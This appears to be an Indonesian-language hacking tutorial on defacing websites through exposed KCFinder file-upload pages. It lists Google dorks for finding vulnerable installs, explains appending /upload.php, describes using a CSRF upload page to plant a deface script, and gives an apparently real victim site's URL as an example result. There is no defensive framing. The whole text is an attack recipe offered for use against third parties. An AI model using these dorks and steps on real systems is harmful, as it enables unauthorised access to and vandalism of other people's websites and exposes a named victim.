Siapkan bahan-bahan untuk defacenya :

1. DORK :

*inurl:/asset/kcfinder
*sites/all/modules/civicrm/packages/kcfinder
*inurl:templates/_editor/kcfinder/
*inurl:includes/kcfinder/browse.php
*inurl:/kcfinder/browse.php
*lib/kcfinder/files/upload
*admin/kcfinder/files/upload
*panel/kcfinder/upload/files
*editor/kcfinder/upload
*Kcfinder/upload/files
*inurl:/panel/kcfinder/ ext:png
Exploit: tambahkan /upload.php di belakang kcfinder

2. SCRF Kcfinder

download csrf

3. script deface,

PERTAMA

masukan dork ke browser anda

2 (1)

cari target yang ingin kalian tusbol

2 (2)

Tambahkan /upload.php di belakang kcfinder/

2 (3)

Kalo Vuln akan ada seperti ini tampilannya

VULN.png

kemudian kita copas linknya paste ke SCRF yang sudah kalian siapkan

paste link ke scrf.png

kemudian buka SCRFnya di browser kalian

trus pilih script deface kalian,klo sudah tinggal tusbol

croot.png

kalo sudah di tusbol kalian web target tdi dan tambahkan di belakangnya “kcfinder/upload/files/nama file kalian

contoh : https://riausky.com/editor/kcfinder/upload/files/pgc.html

dan hasilnya

hasil

Sekian tutorial dari saya semoga bermanfaat

selamat mencoba !!!!!